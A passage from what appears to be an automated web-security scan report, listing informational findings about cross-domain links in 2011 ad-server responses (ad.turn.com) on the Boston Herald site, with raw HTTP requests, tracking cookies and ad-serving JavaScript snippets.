ko9jTov_tduoJ79WLRX3x8Jj6CPb9QD2jcY4QbTolZhp6t2QqCDEnVfKSI9Czqb8VkfhIMtBluaWa_TlPV12CVZH4SDLQZbmlmv05T1ddglWR-Egy0GW5pZr9OU9XXYJVkfhIMtBluaWa_TlPV12CZekQLzj8BqHl0xQJeRVWsdCB_o2VuswdXqYMMGNHfG3Qgf6NlbrMHV6mDDBjR3xt0IH-jZW6zB1epgwwY0d8bdCB_o2VuswdXqYMMGNHfG3UUrgidBzdBjh8B5MmfBQqlFK4InQc3QY4fAeTJnwUKpRSuCJ0HN0GOHwHkyZ8FCqWvltIzMqv1Ia8A8-3JcNhcYY5Ax3y_aeD6ynSPnIOKXGGOQMd8v2ng-sp0j5yDilxhjkDHfL9p4PrKdI-cg4pas0VdShRmcr603-icVYa2s; fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; pf=P2ulGxJH0L6sP7i92CPecgAmiI2Lsig78fIY2fHGbzuJwV9kSIzX4BtZ7vBDkFqiEUMyLdhTUOk0HUHTgKulxX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15003%7C15001%7C15001%7C15001%7C15001%7C15003%7C15003%7C14983%7C15003%7C15003; rv=1

Response

17.87. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The page was loaded from a URL containing a query string:

http://ad.turn.com/server/ads.js?&pub=6264177&code=14383603&cch=14381728&l=300x250&tmz=-6&area=0&res=1920&rnd=0.04441207833588123&url=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&3c=http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279895%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D&loc=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DMiddle1%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Ftrack%252Fhome

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N5823.152304.TRADEDESK/B5157804.5;abr=!ie4;abr=!ie5;sz=300x250;ord=7951675187229449762?
http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.5;sz=300x250;ord=7951675187229449762?;click=http://r.turn.com/r/tpclick/id/Il4Z-HMGWm5UNwUAbAABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279895%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D/url/;
http://ad.doubleclick.net/adj/N5823.152304.TRADEDESK/B5157804.5;abr=!ie;sz=300x250;ord=7951675187229449762?;click=http://r.turn.com/r/tpclick/id/Il4Z-HMGWm5UNwUAbAABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279895%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D/url/;

Request

GET /server/ads.js?&pub=6264177&code=14383603&cch=14381728&l=300x250&tmz=-6&area=0&res=1920&rnd=0.04441207833588123&url=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&3c=http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279895%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D&loc=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DMiddle1%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Ftrack%252Fhome HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=3011330574290390485; adImpCount=jD3N2bWA3-mOnaHNbq6oGr6gUOClkrpfUMKANQ1vhXPfaqaDzVRu9ZiuBStYaftYCBsZxoRT6EzfAaBOxC9wKTt4volhK1SKMMEXrRaSQRZi9OYrtG-b0iAWL5Sg__z6Mu5dojwn5g9wbHIYb9itxx7GYSyR957eDlUpeFx78rgpegjWK4MWwom9unlgMhLXNsCCEbhAsIdsy3zCFGHpw37eq4Z01Gip7C0qED-uDRXnxqTFGB1N4YMlWXm_-MaJLf6A30j8d5gU8-mc72wOIKQrupC4PpJl2uCWF8C-Ug5zE4ga4uSsEjChAQfwWw36Y_OeXGaHeEWZpxqUmyoO4aEqzrlzsjMft3cRcjGnFvni7gawmV97meEG2o8pgUTMVUvCEsZdhQvkMaGDNXRUK841wLk2GYSRC0x3BEve4S431p3A6UMJjebe8drcGsyS5Eq2u8SK-4v0nTmoUt_kkk_bc2bQTBpOPgQ2rj-z4cSfohDo4-tul6_WuD8j0eMjE2VTyWMB9aQAFw797l12xcGDwUqNo5bwBfJavyMoCpVVDlIJowEL2ZJ7bbw_gCtmttGfpE3WazmTpUKWPgdm0Kwwwjl5KiXaen7PpuSxadNSxUp_78PaBWAnqowBUtUuPveIf8j2XY661VgXz9vKrzqd_vJWEpaVGIPem0izQ6aKPrXTIbISjLdU8fmF4gcunvuhdFJQJil2xKmTz50dp7i0E4C4fIPULOO-1bgvNyH-_A6E1_jJbRC0RAQnnmoZNIbl1VrG-a9_rw-zAW2lAwi3YZykxvivNDVu_wiJ-nzpgcqiBETfVCgh6rOLqPGrJHyerevXy89jQMS63zyiKqQrupC4PpJl2uCWF8C-Ug7zI1PJlsg4JH93UKg4p8Y5067axWP77CNDdpZKPWLlSzacm4a-crF0dpacRlQXSurFgJILRn7aDAZTiRRTDpAMVUvCEsZdhQvkMaGDNXRUKxEQUIAYpp-QbAJrP1iB52HqzZ3gkHjNDLavV-i2IDmnKA5Q2hyGLZzy7yP9IhZH9vIPUpju1It7TH_4ufsTy9mfohDo4-tul6_WuD8j0eMjgn3JqGWHn99L8yAc1t0CrMGDwUqNo5bwBfJavyMoCpW5NWAkI-bj2WEMdrQi7smJSD2PyHt-rGJGOJ3lCDBJu6wwwjl5KiXaen7PpuSxadNrWfCFeAmfYB9wvbNyX_HcPveIf8j2XY661VgXz9vKr9c4SMN31V96MWZ_Nbkosfv4Z9eHEmOCw9cZ5JxzVrlAnvuhdFJQJil2xKmTz50dpwLpSN-3LiOu9Vp7WBoDgFL-_A6E1_jJbRC0RAQnnmoZSXWXL95Hb45PXD4y2tHukLgWjDXsTUeTWd5tj4qNaDiJ4nBZ8RXPuIpJnusA91x86GC4mLEfJ2sljTHmzwZbAY_Lh2Ugi8mvJG633sZOiSP-EXc_UXFWP7mPaqhTNB2_pCu6kLg-kmXa4JYXwL5SDkn2PegxRqM5mRRNvuUuPQYa2L50HxvswuEv77HCRTvK8NG6w8lsq_gxT4zTpoxnW4XDDwtPU5vElBnBkAq9aTtVS8ISxl2FC-QxoYM1dFQrRidyFCOVEUccMTneL2wPB2akJ6Zxx4MaHG4qowJX52eEsNCVznntZWR3U7tjmpSZjO1tJ8qK8UAy-VKR7Q8r4Z-iEOjj626Xr9a4PyPR4yOY4aAiwQlqVTaDNmxm60K7wYPBSo2jlvAF8lq_IygKlaFm_ARvcAKoZH-AIv62HmLHlgdVIiUBy9FQ0RyPwh-_rDDCOXkqJdp6fs-m5LFp08ZtWn1dPsjZXR0HI6ZwQiQ-94h_yPZdjrrVWBfP28qvqcQn-qKG1Gb1Z9AhVjY5XByMOV9_koeB1I57EmsQtHqbnNLg8Qx7fq0wYdnvZy7Y32feEuljMvvhciAahuPk0P78DoTX-MltELREBCeeahnJarbE4M_xRXSdcI4iMbNNITjgnthAiWrbbf30tKcRFHS__DAzsh0vKgYK4DlknsYsTXzTIe6cvP8Fgp6v0iG1pCu6kLg-kmXa4JYXwL5SDnCxFISzUKJrnz8NWtmYNBgbnCbJPSsHs0iOvX6zYZZ441JwlocRM-1StCCQK60MTAivtkH0XcIkoBkuY7jUSFZVS8ISxl2FC-QxoYM1dFQrFMPrYvz2Ts1Ij_XSz-xv_NWGImt49pAB5RbCmhGeBVfK2_lUCO-ofMYaBVz1MsW3qBtHiSDSYD2cppR2YtGNYJ-iEOjj626Xr9a4PyPR4yPVhnlIkVgFWAUsSjI0os5awYPBSo2jlvAF8lq_IygKlcymYwSoiOeW4YEq5c_wtcPOvPQvhLJNbC2RmtNyUVddQ_F7c57KXIm9M4O-4Hye-wueocyz5z4Zh4_TTFn-uAowvSXZHGSyvtzgTZp8tkHW1Lph5MNqkh8XeX6MytKBTrzG1aXCqxVf5nZAA7HLfYwHFS74pGVX6R7fIB4_ENcKBxUu-KRlV-ke3yAePxDXCgcVLvikZVfpHt8gHj8Q1woHFS74pGVX6R7fIB4_ENcKkJ7WkZl4NM0k2bFXusY9VItRHAs1DGSp43CQgKuilTWLURwLNQxkqeNwkICropU1i1EcCzUMZKnjcJCAq6KVNe4dObEIMtKsHRmogbr3003uHTmxCDLSrB0ZqIG699NN7h05sQgy0qwdGaiBuvfTTe4dObEIMtKsHRmogbr3002Ul8WnhGx-5A8JgMe8wN1plJfFp4RsfuQPCYDHvMDdaTzS0erQLm3C2K0qtVlbCNOT8XToW0yxZ3rNQFHzVErUUFo10m1vdQ1esR0Vej5o2VBaNdJtb3UNXrEdFXo-aNlQWjXSbW91DV6xHRV6PmjZiM7S8Ta6ZVi8L44nt5Lbx_VtNJu5mSi-Do8DnZc8Z5lgZTgyDxl-p9HfhLxfMdBCgGuqQYTxk1W2ZXZk9Fbu2FD6CgQVbZgEbhsoT18Qyzhw7W5j5_klUHK2cIyCgrVuHA0g_1_zvhzGxm5cQYKDYoCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgJ4GX4OjUVNjX2CulbPhbbQ6QSLK4RiJR_RkawdJ2DWG8nWnpcW2PqfBIM0QT5xSvI67q-6Y9u6ozlXnWk2Vqae3zeygEkfAxz0LdLPYjcint83soBJHwMc9C3Sz2I3IE2wSFrg3YhUxrd13SPf4zdk0py110jTFeWakVDqJkX2L9hnORGvmj8mxjNocqMdc8PVvEcs62kDyw4j4Ti-ngvD1bxHLOtpA8sOI-E4vp4Lw9W8RyzraQPLDiPhOL6eC8PVvEcs62kDyw4j4Ti-ngur7bsp5Fvhi44QSuDqR21RI-fooknOV-tsJXjS2yRhbSPn6KJJzlfrbCV40tskYW0j5-iiSc5X62wleNLbJGFtI-fooknOV-tsJXjS2yRhbPg2v6FqwK2qGH2NT2HwC2T4Nr-hasCtqhh9jU9h8Atk-Da_oWrAraoYfY1PYfALZ9KcqOJj5P-El2YxOi1A-SJzgRA1_Lhfy9FvJaW7uwAuc4EQNfy4X8vRbyWlu7sALnOBEDX8uF_L0W8lpbu7ACykgbtzLVWjLpGASKeaSS94; fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; pf=DDphSjcGk-rcs3g8uiJ3tdVnoSLgvd8DzizssL9FyFKJwV9kSIzX4BtZ7vBDkFqigSFYvDNduS7kxw0buCFgeX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15003%7C15001%7C15001%7C15001%7C15001%7C15003%7C15003%7C14983%7C15003%7C15003; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Mon, 31 Jan 2011 01:55:09 GMT
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:55:09 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=Q2BDGLjfiARZbN8b3TXoKCNCtKIL-r9iDqITQDnnSsaY481wEkFtGX7HudJA1SwJCBsZxoRT6EzfAaBOxC9wKTt4volhK1SKMMEXrRaSQRZi9OYrtG-b0iAWL5Sg__z6Mu5dojwn5g9wbHIYb9itxx7GYSyR957eDlUpeFx78rhPAxXzEzYUFqdsvXkuFIOaoxd_oldZyM_0h2lwQ2vV-oPWvpR2lvg2CTziw80-4eo8F9xA-g6RuoYQKpeVv73XLQkHE3nbfiVxApQ1oZYbmX9ZeDk-Z9Mb4drqyLE7KPtnmkfeQoFbVixLdk5YAN4PGnMoZ0x3TQuKe2B1edDEU6sFwtDx2lJttCmO3ikXUoRriPGYYJIwMnnp0drU0iPKrDDCOXkqJdp6fs-m5LFp06AT3l7X8Fu562OsS_bZq3w-94h_yPZdjrrVWBfP28qvw5g9aOhI5RNPyE9rahUCbt3lzlA6-E_XLXUwKlz8M8Rge-axmvL7QRbbVTcWH_69gNe7Lp99y-WLm2CQwebhsP78DoTX-MltELREBCeeahldH37m3WrGWRs0rxyrhTIvfNDSBptsBfTCIkNpNIZ-estuyxh9bLEhi_2rYF-v3jU-PyGR7zYZKkURVc4VktqypCu6kLg-kmXa4JYXwL5SDme2jKGznyNxnorhkYhuuyfTrtrFY_vsI0N2lko9YuVLMugtX4JGvQuQNrdCkfnoNLQy3HrDk_mqO0a-EdfNtHhVS8ISxl2FC-QxoYM1dFQriDP20OwUBwmVn04CK7SdmOrNneCQeM0Mtq9X6LYgOadpuC766m5RMjVQV9XDrztlefh7m2CDoV_VGAxZRTmH65-iEOjj626Xr9a4PyPR4yMPDZSQiR8N05VXl8Kl5CF5wYPBSo2jlvAF8lq_IygKlQ4AcvxicaQ0QJv3A-NEwrP_vYlQQcTfv4G9VvPeZUwSrDDCOXkqJdp6fs-m5LFp05G3ZVFVoXjdVnl7Wbi3hO0-94h_yPZdjrrVWBfP28qvxkUWUDF6X3KpqQdl41aNM0RM74xthkDRQvK455LrVCLLNoiMiQCbY7XGffLYXA_SuLQTgLh8g9Qs477VuC83If78DoTX-MltELREBCeeahlgVK-gLzc7v3bufMT3ciwRPOq7W_c7yCEewncWyerLNirskINCTJZ2w2X1u_Ffr45hIaHa_H76oN5ioqf3DUNypCu6kLg-kmXa4JYXwL5SDgVZpbAYwmSs52tJ3ph4JCMa2L50HxvswuEv77HCRTvKMugtX4JGvQuQNrdCkfnoNG4mlIa-6dAvewF741vW4jhVS8ISxl2FC-QxoYM1dFQrs_FmoMnxSVp_tZOCUusIKmakJ6Zxx4MaHG4qowJX52cdsqn6EbbEHzpw1cahm_ednSAyZag0hguPHBGDv4D0F89cj7I3Xm3rPyyOvzQMcybDLE8i5ZewRD7RValSE2YFn6IQ6OPrbpev1rg_I9HjI5ynCo2hqWp8ighHIhRcz2nBg8FKjaOW8AXyWr8jKAqVscXOphesMEv_hKT95FZL-tNurEXc2b78YksLyMCs4H6sMMI5eSol2np-z6bksWnTTE9U8rPoK07OvagfeUFMTT73iH_I9l2OutVYF8_byq_c1Kq7NjC9E9a0eoW9ANcQm2_M-Vs_XiB22OkRMt9wZss2iIyJAJtjtcZ98thcD9J5TC-ggthaT5RIrPMrgXzf_vwOhNf4yW0QtEQEJ55qGc-5cVQ6I7r0sZiLYoBNLt9wJREdAQCGkjhwfIbDh8eKH3liqW8YkScefdM86sUHP_PaiF7fYodG30TCcbE3BCWkK7qQuD6SZdrglhfAvlIOyAmQVZ9Gk9LJN20oRH7d9xucJsk9KwezSI69frNhlnh-VzDUnvD0VSF9GprGKshZpvViBXcPLi1FjMYUJVEbmFVLwhLGXYUL5DGhgzV0VCtu-wgzPw8HAJyjq29STFT-1YYia3j2kAHlFsKaEZ4FVzZEDIrmol-EatT1dqZXDk0mJSx72jjc-JYaXuGhWqtrn6IQ6OPrbpev1rg_I9HjI98tK4Lkd3yYgSLJJRfeUv3Bg8FKjaOW8AXyWr8jKAqVIJgqaELa9gf4ED3OCBald8enkhYgNEwqu2cgvufAu8qsMMI5eSol2np-z6bksWnTbV-gOod-LZDuMZIGw8px0j73iH_I9l2OutVYF8_byq-eWXxP40DPBXd3KCfiOrroHIw5X3-Sh4HUjnsSaxC0epuc0uDxDHt-rTBh2e9nLtgi0gluZrsw7wDK_J5brg91_vwOhNf4yW0QtEQEJ55qGXFlxPVND7eK0NKkmYcNg9jOWDFl6Eb2AIoC5V4JNNKLUZ0sucMJLd08lMBqbvDIPaQ9DijJjsm5f6UC3GKLnVdkeGy8tt3_Zt_zWHCziuKg5syEq3UFt31YVe3zZxRiTrPsbMN1vS3TFG_DmRWjBGp4OSJWgeI3Ow76nnBboeSngJ4GX4OjUVNjX2CulbPhbYCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgeS-Ii0cHw18f8N_OREqrYbydaelxbY-p8EgzRBPnFKG8nWnpcW2PqfBIM0QT5xShvJ1p6XFtj6nwSDNEE-cUq3c3PCvX0K0pCDfAY7KB6rh-9zvu-4SLKmRwnyZzNBL4fvc77vuEiypkcJ8mczQS-H73O-77hIsqZHCfJnM0EsQJZTKOtMP9Ca7gcv2lCqRVcj84RfJT-7cTVPiV9xkT9uAa-_yMHADocL3iDyiyA3FI1v0pIp1Oq279aEkk1j6WhzPlVze60NJNLk_VPM-uFocz5Vc3utDSTS5P1TzPrhaHM-VXN7rQ0k0uT9U8z64WhzPlVze60NJNLk_VPM-uAvhIyyKReEJO7XhpyT2HyIjDPzDEEzts25-A_eYUS74d88E5NxpHVycir8QBFmIqyIxNLNbqy6vHlykIVOX3LklZBgm0y1exivcb_gfhBEDWb6jHmyzw4IbjqaiC8Out2XpzTAYSv-BElQmRmwUjrxl6c0wGEr_gRJUJkZsFI68ZenNMBhK_4ESVCZGbBSOvL-FrFoAGy0sFOEtM5Nuv1rHf67HEvueUzrmEU5VKarK0pFHmk8ureZOA97fEANKtQvhIyyKReEJO7XhpyT2HyIL4SMsikXhCTu14ack9h8i0WpNDrvYk58e1CQBxU9aoW0GgBz7JE6lT1FzCJ5VNfptBoAc-yROpU9RcwieVTX6OyZXhK3RWfu9UgjQxzq_ZTsmV4St0Vn7vVII0Mc6v2U7JleErdFZ-71SCNDHOr9lOyZXhK3RWfu9UgjQxzq_ZVXO01XiSEZlE5C1tJgs0ioM_0RPnIuudzXDvK7K8vPFDP9ET5yLrnc1w7yuyvLzxQz_RE-ci653NcO8rsry88UM_0RPnIuudzXDvK7K8vPFdLmcsxIHfv-CcNp2nsZsDDJxgXJI7GH1VuUBYoyz48YycYFySOxh9VblAWKMs-PGv29VFO9u1uo-sTqh6dCOpkhLk4ViUsMPsWwjDbC_pXdIS5OFYlLDD7FsIw2wv6V3SEuThWJSww-xbCMNsL-ld3iOttRS0QEfXzzQ32Qakh0VYOKF3X7wdD8Dnz7l4C4j; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:55:10 GMT; Path=/
Set-Cookie: fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:55:10 GMT; Path=/
Set-Cookie: pf=Mgovx84h_Ov--Xj3--F0rsLmce8wzSDXw3BvrEZAKNiJwV9kSIzX4BtZ7vBDkFqivBHW9RKwIdLIwhhMny1M2H4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:55:10 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:55:09 GMT
Content-Length: 10132

var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
concept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;

document.write('\n\n\n\n\n     \n    \n        \n        \n    \n\n\n\n\n\n\n        \n        \n        \n                \n                \n            \n                \n                <IFRAME SRC="http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.5;sz=300x250;ord=7951675187229449762?;click=http://r.turn.com/r/tpclick/id/Il4Z-HMGWm5UNwUAbAABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279895%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D/url/;" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5823.152304.TRADEDESK/B5157804.5;abr=!ie;sz=300x250;ord=7951675187229449762?;click=http://r.turn.com/r/tpclick/id/Il4Z-HMGWm5UNwUAbAABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279895%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D/url/;">\n</SCRIPT>
...[SNIP]...
95%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D/url/http://ad.doubleclick.net/jump/N5823.152304.TRADEDESK/B5157804.5;abr=!ie4;abr=!ie5;sz=300x250;ord=7951675187229449762?">\n<IMG SRC="http://ad.doubleclick.net/ad/N5823.152304.TRADEDESK/B5157804.5;abr=!ie4;abr=!ie5;sz=300x250;ord=7951675187229449762?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.88. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The page was loaded from a URL containing a query string:

http://ad.turn.com/server/ads.js?pub=5766351&cch=5766918&code=5766926&l=728x90&aid=25206694&ahcid=78205&bimpd=21muvIbp10pUTWpgKeYXuBQpi4lGWgXGmwtEktp0bnhlzcEPCmKdzaOiN1w1JuG39EwjnwLbuWY9jCkZnpaQCWMdTXpPOHIA4Z3jWxQxlq4y0vr517NqPsPUS5E3qaEy91D0_KKhuTQf67OuV_F749IlnflTkyMzHOFj90yiivHk_Cifb2ytW8v8q_Ju-6U92ggx_bSQJBFgf_df8ZyZOeIlwU6iDh8JI6jOqp9q_Wu3L84a7I2NobirdMafsG3a4N_1k_LcbI1l_qw0hEgsW7ih2yQWaHy9ifTWvGQp8MHeKeZbcKBEFJ-wvfKan3_Boe6iWHbggg0Ypr7Atghsve1apqwxaDzB0mbr6PDH01f6uHcLMkCy-9027k5Tm6h9eWjcOJtBxwrIpab7eQoB2_vtezeQUtzKlS-ZQl0TjFHJLs4Ovk7WWqSFZMBZz0bEQl2pohKvINvcsARm5gxTHdmyu_XeZQTM0Y5XRGWekIB53lXvcwhi6qGeInxFIoFRfkbJ9D6YlCf5v80FPzVo5ZXIC94vkRX48casGySCH6SZxmuGhwjIl1JUdlPvihaCvfBz5xDsVEqchMpjM7fNhfDYOPZ0JXZ2uZFvjyYJf-F96K7oroatdbmzLY4GaezlgHULOjMY_qhRxKBMycAthKXuC9_2QhUUPMZBRYynaNwC3_JOWKiVz48eoEJe8dgOqRCcEuBcKxtaNJfsYHiQ1JAURjFg_cZiTZL5pFw8O7mjsZQyAQ6kVAwWSib4A4xDzHGAvnK92wWrpVqHjkZPWuoljc-5zAAoOxoBcBgje0LDTAGcK0LbrjjUGkdS7-oV&acp=35600B7D7485C869&rtbacid=55ed4e5e03bf8e5477cfcd0039923902d2e38a03

The response contains the following link to another domain:

http://bs.serving-sys.com/BurstingPipe/BannerSource.asp?FlightID=1891435&Page=&PluID=0&Pos=8470

Request

Response

17.89. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The page was loaded from a URL containing a query string:

http://ad.turn.com/server/ads.js?&pub=6264177&code=14383608&cch=14381728&l=728x90&tmz=-6&area=0&res=1920&rnd=0.4859149551484734&url=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&3c=http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D&loc=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DBottom%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Ftrack%252Fhome

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N5823.152304.TRADEDESK/B5157804.4;abr=!ie4;abr=!ie5;sz=728x90;ord=3636088819337780094?
http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.4;sz=728x90;ord=3636088819337780094?;click=http://r.turn.com/r/tpclick/id/fttlMIT7dTL47AUAbwABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D/url/;
http://ad.doubleclick.net/adj/N5823.152304.TRADEDESK/B5157804.4;abr=!ie;sz=728x90;ord=3636088819337780094?;click=http://r.turn.com/r/tpclick/id/fttlMIT7dTL47AUAbwABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D/url/;

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Mon, 31 Jan 2011 01:55:09 GMT
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:55:09 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=CzaUagyzJtSBLjsy0u3haSAZPNitScPvnSLF6fMgMZffaqaDzVRu9ZiuBStYaftYCBsZxoRT6EzfAaBOxC9wKT4Z56e4E96NaNZjC_AOT217oTThsnNqViHEtNUDKqf-OEq2AfRSlzTnZwWXTHks0QZw0eRZgpytzjhC6uPoirkbo99Ly4MRp-sHvVRtMw0mxBBAcu5l3b38_4JJMshXQH7eq4Z01Gip7C0qED-uDRXnxqTFGB1N4YMlWXm_-MaJLf6A30j8d5gU8-mc72wOIKQrupC4PpJl2uCWF8C-Ug5zE4ga4uSsEjChAQfwWw36Y_OeXGaHeEWZpxqUmyoO4aEqzrlzsjMft3cRcjGnFvni7gawmV97meEG2o8pgUTMVUvCEsZdhQvkMaGDNXRUK841wLk2GYSRC0x3BEve4S431p3A6UMJjebe8drcGsyS5Eq2u8SK-4v0nTmoUt_kkk_bc2bQTBpOPgQ2rj-z4cSfohDo4-tul6_WuD8j0eMjE2VTyWMB9aQAFw797l12xcGDwUqNo5bwBfJavyMoCpVVDlIJowEL2ZJ7bbw_gCtmttGfpE3WazmTpUKWPgdm0Kwwwjl5KiXaen7PpuSxadNSxUp_78PaBWAnqowBUtUuPveIf8j2XY661VgXz9vKrzqd_vJWEpaVGIPem0izQ6aKPrXTIbISjLdU8fmF4gcunvuhdFJQJil2xKmTz50dp7i0E4C4fIPULOO-1bgvNyH-_A6E1_jJbRC0RAQnnmoZNIbl1VrG-a9_rw-zAW2lAwi3YZykxvivNDVu_wiJ-nzpgcqiBETfVCgh6rOLqPGrJHyerevXy89jQMS63zyiKqQrupC4PpJl2uCWF8C-U